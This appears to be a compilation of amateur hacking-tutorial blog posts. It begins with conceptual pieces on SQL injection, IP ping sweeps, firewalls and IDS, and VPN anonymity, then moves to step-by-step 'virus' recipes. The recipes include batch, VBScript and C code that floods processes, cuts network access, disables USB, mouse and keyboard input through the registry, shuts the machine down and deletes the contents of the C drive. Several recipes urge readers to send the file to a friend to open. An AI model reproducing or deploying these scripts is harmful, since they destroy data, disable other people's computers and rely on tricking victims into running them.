SQL Injection

SQL Injection

Hello Friends, Today we are going to study SQL injection. What they are ? How they Work ? Who can Use them ?

What is SQL Injection ?

SQL injection attacks have been around for more than a decade and they remain popular with hackers.

SQL injection is an exploit used by hackers to steal data from Organizations. It is used to target web application Which generates Content based on user input.

Most Website have a database on the backend which Contains User data, Personal details of Customers, Credit card information, etc. A language called Structured Query Language (SQL) is used to enter and retrieve the data from the database as well as to manipulate it. This language is universal. Almost all database Support SQL, Including Oracle, MS SQL Server, My SQL.

Web application query the backend database to display custom content on the web page. The website presents a form to be filled in by users before serving them appropriate content. The web application assumes that users will provide simple text inputs to the form. Instead, hacker enter SQL queries in the form as input. If user input is not properly validated or sanitized, the SQL query gets executed. Hacker may get the whole database to dump itself on the web page, using a well crafted SQL query.

dynamic script language like PHP, .NET, ASP are susceptible to SQL injection attacks. The tools required by the hacker are very simple - some knowledge of SQL queries , a web browser and a little smarts for guessing table name and field names. there are also tools available online which automates most of the process for hacker.

This is one of the most popular attacks due to its sheer simplicity. Through SQL injection vulnerability has been known for a number of years, many website still remain susceptible.

Firewalls offers almost no protection against SQL injection. That is because all http data is passed on the wen application which in turn has "full access" to the backend database , so that it can present relevant data to the user. Nowadays , we have web application firewalls which provide some degree of protection. However , it is best to safeguard against this attacks by validating and sanitizing all user inputs before passing it to the database.

Effects of SQL Injection ?

An SQL Injection attacks can have a huge impact on the organization.

The hacker gets complete control of the server and all the data on that server. Also , Since this is an internal Server, an attacked server may be used to cpmpromise all the elements on the network. If the intension of the hacker is to steal confidential data , Them he goes about this attacks with great stealth. As we often see in the news orgnization seem to know nothing about the attacks , till all the credit card information of their customers is stolen and gone ! The attacks on target (Holiday season , 2014) is a classic example of this. This wasnahuge loss of face for target , and caused customer to stay away even after repeated assurance that not a data was lost.

Types Of SQL Injection Attacks

SQL injection attacks can be classified based on the injection mechanism.

1.Injection through User Input

This is the simplet form of an SQL injection attacks.SQL queries are sent as users inputs in forms submitted to web application.OIf no user input is done by the web application , the query is executed and the attacks gets underway.

2.Injection Through Cookies

web application store stae information on clients in the form of cookies. since these are stored on the user's system . malicious hacker can tamper with cokie and put SQL queries inside the cookie. When the hacker accesses the website again , the web application inadvertenly uses the tamperes cokkie to construct SQL queries which may have disastrous consequences. 

3.Injection Through Server Variables

Http headres , IP geadres , enviroment variable are all server variables and may be stored in databases for logging and determining usage statistics. It is quite easy for hacker to midify http headers and insert SQL queries in them. If these headers are stored without any sanitization or validation , then the attacks is triggered when the command is issued to log them to the database.

All the above are comsidered first order attacks which means that the attack is executed immediately on initial contact with the database.

4.Second Order SQL Injection Attacks

This is also knows as the stored SQL injection attacks. This attacks is not executed when the malicious inputs in initially entered in the database. It is triggered when the web application later tries to use that stored input by retrieving it with a legitimate query

The second order SQL injection attacks is inherently more complex than first order attacks as the sttacker has to guess how the input will be used later by the application. Web application usually trust data retrived from database and use it as"as is " with out validation> This is when the attack kicks in.

The best safeguard against SQL injection attacks is to validate all the input-whether from user or the database.

How to Ping a Pool of IP's

Hello Friends, Today i am Gonna show you How to Ping a Pool of IP's. Pinging IP's helps us to find Alive IP.

What Is IP address ?

An Internet Protocol address (IP address) is a numerical label assigned to each device (Computer, Printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

What is Ping ?

Ping is an basic Computer Program That allows a User to verify that a particular IP address and can accept requests.

Ping is Used Diagnostically to ensure that a host computer the user is trying to reach is actually Operating. Ping work by Sending an Internet Control Message Protocol (ICMP) Echo request to a specified interface on the Network and Waiting for a Reply.

Pre-requisite

• Computer Installed with OS
• Internet Connection (Broadband, Dial-up )
• Angry IP Scanner (Tool)

Steps How to Ping Pool of IP's

1. Install the Tool "Angry IP Scanner". It is Free Available on Internet (No need of Crack Version)

2. Start the Angry IP Scanner With always Run this application as Administrator. Because it allows all permission to the application.

3. After Running application as Administrator u will Get this window.

4. Go to Tools menu & select Preferences.

5. Select Display and Check on the Alive port.

 This setting done only to see Alive Ip's

6. Apply settings by Clicking OK button.

7. Give the Pool Of IP's Which you want to check & click on Start button.

8. Wait for Some time it will show you result like this.

9. You will see the Result like this. Result shows you No. of Hosts scanned & How many of them are Alive.

________________________Thank You________________________

Understanding Firewall & IDS

Business try to protect Their resources with a number of tools and devices. It is the Job of the Ethical Hacker to understand how they so that they can be fortified , if found vulnerable after an ethical hacking attack.

Firewall

What is Firewall ?

Firewall is an appliance or an application that controls the flow of traffic from private network to public network based on the rules configured. The Firewall acts a a barrier between secured internal network and public networks.

Newer Generation firewall can do much more than just controlling network traffic they can block unwanted websites, stop viruses from being download and also filter spam massages.

What are the functions of a Firewall ?

The Primary Function of a Firewall is to control the Flow of Traffic between different Network.

It also does Network Address Translation (NAT) for all requests coming from local (LAN) Networks going to the Internet and also checks whether this user or host is allowed to access the Internet.

For example, If a web page is requested by a local PC , then that requested has to be Natted to a public IP address and approve by the Firewall to reach the Internet. The response coming back from the webserver has to be accepted by the Firewall. Only then can the web page be displayed on the host.

Firewall can also handle Virtual Private Network (VPN) Connections to establish a secure communication channel between different network.

User authentication is also Firewall feature , used to verify users before giving access to resources on other networks.

Intrusion Prevention System

What is IDS ?

Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it.

There are network based (NIDS) and host based (HIDS) intrusion detection systems. 

How does an IDS work

An Intrusion detection system (IDS) has attack signatures provided by the vendor. Every request Received by the IDS will be Compared against all the signature to identify a know attacks.

IDS also does a heuristic analysis to identify any malicious traffic patterns, but this requires the IDS to learn the normal traffic patterns, but this requires the IDS to learn the normal traffic patterns to a specific server or a specific service.

Span

Switched port Analyser (SPAN) also called as a port mirroring is a method of transmitting a copy of all packets received on one port of a network switch to another port for analysis.

Span has to be configured on the network switch to capture traffic On IDS for inspection.

IDS Tools

There are different IDS tools available, the most popular ones are Snort, OSSIM (Open Source Security Information Management) and Sguil.

How To Surf Anonymously & Access Blocked Content

Hello Friends, Today I gonna Show you How to Surf Anonymously on Internet & Also How to Access Blocked or Censored Content on Internet. We are Going to use Tools to Surf anonymously on Internet.

How To Surf Anonymously

What is surfing Anonymously on Browser ?

Surfing Anonymously on Browser means Surfing on Internet without Showing user's identifiable Information like IP etc. This can be done with the help of Proxy server, Virtual Private Networks & other Anonymity Program such as "Tor".

Surf Anonymously

Pre-requisite

• Computer Installed with OS
• Internet Connection (BroadBand, Dial-up)
• Cyberghost (Tool)

 What is Cyberghost ?

Cyberghost is a fast, simple & efficient way to protect our Online Privacy, Surf Anonymously and Access Blocked or Censored Content. It offers top-notch Security and Anonymity Without Being Complicated to use or Slowing down your Internet Connection.

Cyberghost is an application which allow you to encrypt your Internet Connection.

You Can Download The Cyberghost Tools link is given below.

-----------------------------------------------------------------------------------

http://www.cyberghostvpn.com/en_us/download/windows-vpn

-----------------------------------------------------------------------------------

Steps to Use Cyberghost

1. Go to the Link Given and Download the Cyberghost tool.

2.  After Download, Install the Cyberghost & Download the Required Component.

3. After Installation Go on www.whatismyipaddress.com & See your IP address.

Now you can See that my IP is "49.206.206.89" & I belong Hyderabad, India.

4. Start the Cyberghost Application You will see this window.

5. Now Click on Power button to Start the Tool.

6. After Starting the Tool you will Get this Window.

7. Now you can See that I got new IP address which is 199.115.115.209 & This IP belong to Pristina Serbia U.S.A.

8. Now Go Again to www.whatismyipaddess.com to see What is your IP address.

I got new IP address which is 199.115.115.209 & This IP belong to Pristina Serbia U.S.A.

How to Access Blocked Content & Censored Content

At Some Places Some website are blocked to Access. The restrictions that are actually dependent on your location. This is all Because of your server Geo location. For Eg If you are in China you can't Access the Facebook Because in China Facebook is blocked. The server from which you are Requesting to open Facebook is Located in China So you can't Access the Facebook If you want to Access it First you have to change your Server Use Cyberghost application to Get Connected to new Server Which is Located in Another Country & Than request the Server to open the Facebook you can Access the Facebook 

___________________________________Thank You___________________________________

Virus That Crashes the Computer

Hello, Friends Today we are Going to make a "Virus that Crashes the Computer"

So Friends, Today we creating a Virus That Crashes the Computer. So please don't try to run this Virus On your own Computer. This Virus is very dangerous for Computer. This can Harm your Computer very badly. I will not be Responsible for any Damage done to your Computer. Do all the Practical on your Own risk.

In this Post, We are going to develop a "Virus" which Crashes the Computer. To Develop this Virus i am going to use Visual Basic Script. 

After opening the Virus Computer get Crash. There is no other way to protect your Computer.

[Note] This Post is only for Educational Purpose.

Steps to Create Virus

1. Go to Start Menu.

2. Open Notepad.

3. Just copy & Paste the Code Given Below.

_______________CODE_______________

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

____________________________________

4. Save this file with ".vbs" Extension.

5. Your Virus is Completed. It is ready to Run.

_________________________Thank You_________________________

Virus That Stops Internet Access 

Hello, Friend i am back With some Hacking Tutorial. 

Today. We are going to make a "Virus" Which Stops Internet Access. 

This Virus Is very Danger so don't try to Run this virus on your own computer. Otherwise you will not be able to Access the Internet. I will Not be Responsible for any damage done to your Computer. Do all Practical at your Own Risk.

In this post, I am going to Tech you How to make a Simple "virus". To make this virus i am Going to use "Batch language".

[Note]: This Virus is Only For Education Purpose. 

Once Virus Executed. It Denied the access to the Internet.

Steps to Create Virus

1. Go to Start menu.

2. Open Notepad.

3. Just Copy & paste the Code given below.

_________________CODE_________________

@echo off
Ipconfig /release

_______________________________________

4. Save the File with ".bat" Extension.

5. Your Virus is Complete Virus is ready to run. 

Steps to Disable Virus

1. Go to Start menu.

2. Open Command Prompt.

3. Type the Code Given below & Press Enter.

_________________CODE_________________

IPconfig /renew 

_______________________________________

4. You can See that You get the Access to Internet.

____________________________Thank You____________________________

Virus That Disable USB Port

Today, We are going to Create a "Virus that Disable your USB Port"

Please Don't try to Run this Virus on Your Own Computer. This will Disable your USB Port. I will not be Responsible For any Damage done to your Computer.

In This Post, I am Going to Show you How to create a simple "Virus". To Create This Virus We are going to use "C Language". Anyone with Basic Knowledge of C is able to Understand the working of this virus Program.

Once the Virus successfully Executed. It will Disable (Block) all the USB Port. As a Result you will not be able to use any USB device on Your Machine.

Prerequisite

1. A Computer.

2. Compiler.

3. Notepad.

Steps to Create Virus

1. Go to Start Menu.

2. Open Notepad.

3. Just Copy & Past the Code given below.

__________________CODE To Disable Port__________________

#include<stdio.h>

void main()

{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");

}

_______________________________________________________

4. First Compile this code after Compile you will get Same name file in same Place with ".exe" Extension.

5. Execute that ".exe" file your Virus will run & disable all USB Port.

Steps to Remove Virus

1. Go to Start Menu.

2. Open Notepad.

3. Just Copy & Past the Code given below.

__________________CODE to Unblock Port__________________

#include<stdio.h>

void main()

{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");

}

________________________________________________________

4. First Compile this code after Compile you will get Same name file in same Place with ".exe" Extension.

5. Execute that ".exe" file your Anti-Virus will run & Unblock all USB Port.

________________________________Thank You________________________________

Virus That Create Multiple Folders in All Drives

Today,We are Going to create a "Virus That create Multiple Folder in all Drives."

Please Don't try to Run this virus on your own Computer. This virus is very dangerous for your Computer. I will not be Responsible for any Damage to your Computer. Do all the Practical on your own "Risk".

Prerequisite

1. A Computer.

2. Notepad.

Steps to Create Virus

1. Go to Start Menu.

2. Open Notepad.

3. Copy the Following Code Given Below.

_______________CODE_______________

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS

__________________________________

4. Save the File with ".bat" Extension.

5. Give this File to your Friend & tell him to Open The File. It will create Random Folder in all Drive.

Make a Virus That Disable your Mouse

Today, We are going to create a Virus that Disable your Mouse.

Please Don't try to Run this Virus on your own Computer. This virus is Harmful for Computer. Otherwise Your Computer get Infected. I will not be Responsible for any Damage done to your Computer.

Prerequisite

1. A Computer.

2. Notepad

Steps to Create Virus

1. Go to Start Menu.

2. Open Notepad.

3. Just Copy and Paste the Code 

___________Code___________

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------

4. Save the File with ".bat" Extension.

5. Send this File to your Friend & Tell him to Open The file. His Mouse will not work after Opening the File.

Virus to Format the Disk

Today, We are Going to Create a Virus that Format the C Drive.

Please don't try to run this Virus on your own Computer. Because, It will Delete all the content of "C Drive".  I will not be Responsible for any Damage done to your Computer.

Prerequisite 

1. A Computer.

2. Notepad.

Steps to Create Virus

1. Go to Start Menu.

2. Open notepad.

3. Just Copy and Paste the Below Code.

_______________Code_____________

@Echo off
Del C:\ *.* |y

________________________________

4. Save this File with ".bat" Extension.

5. Send this File to your Friend and tell him to open this File.

_______________________________Thank you_______________________________

How to Become Hacker

Today, I am Going to give you Knowledge about Who is Hacker and Skill's of Hacker

Who is a Hacker..???

The Hacker is the one who has good knowledge of computer. A Hacker is one who is able to gain the Unauthorized access to your Computer or your Privacy.

Types of hacker :-

1. Black Hat Hacker.

2. White Hat Hacker.

3. Grey Hat Hacker.

Skill's of Hacker :-

Hacker has good knowledge of all this module.

1. Networking.

2. Operating system.

3. Router.

4. Switch.

5. Applications 

6. Programming.

7. Scripting.

8. Database.

Virus That Shutdown Computer

Virus That Shutdown Computer

Today, We are going to create a "Virus" that Shutdown Computer.

We Requied Only:-

1.A computer.

2.Notepad.

Steps to Create virus :-

1.Open Notepad.

2.Type "shutdown.exe -s".This Command will immediately Shutdown Computer.

3.If you Want to Give some Time Use Command "shutdown.exe -s -t 45".This Command will Shutdown Computer after 45 seconds.

4.If you want to leave a Message Use Command "shutdown.exe -s -t 45 -c "comment"". At the Place of Comment You Can write your Message which You want to Show.

5.Save the File With ".bat"extension.

6.Run the Newly-Created File to run Your Shutdown Process.

____________________________Thankyou________________________________

Virus That Disable Keyboard

Today, We are going to create a "Virus" that disable keyboard.

We Requied Only:-

1.A computer.

2.Notepad.

Steps to Create virus

1. Open Notepad.

2. Copy the Code below And Past it in Notepad.

_______________CODE__________________

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

_______________________________________

3. Save the Notepad File with (.vbs) 

4. Open the Notepad file.

5. You can See that Your keyboard is not working.

How to solve this problem....?

Just only Restart your Computer.

____________________________Thankyou________________________________